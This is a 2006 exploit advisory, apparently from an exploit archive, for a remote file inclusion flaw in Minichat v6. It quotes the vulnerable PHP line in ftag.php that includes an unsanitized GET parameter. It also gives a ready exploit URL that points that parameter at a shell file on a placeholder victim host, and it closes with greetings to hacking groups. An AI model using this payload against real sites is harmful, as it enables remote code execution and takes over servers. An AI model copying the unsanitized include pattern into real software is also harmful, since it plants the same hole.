id: 962
date: 10/10/2006
title: Minichat v6 (ftag.php) Remote File Include Vulnerability
author: Zickox
cves: 

========================================================
Minichat v6 (ftag.php) Remote File Include Vulnerability
========================================================



###############################################################################################################

     Minichat v6 Remote File Include
###############################################################################################################

Affected Software .: Minichat v6
Class................... : Remote File Inclusion
Found by.............: Zickox

###############################################################################################################
Affected File:

ftag.php

###############################################################################################################

Code vulnerable:

<? include($_GET['mostrar']); ?>


###############################################################################################################


Exploit:

http://www.victim.com/path/ftag.php?mostrar=shell.txt?

###############################################################################################################

Special GreetingS: NETTOXIC | Txis | The Shredder | erboot | trty | jasus | Cvir.System | ZeroHack Team




#  0day.today [2023-03-25]  #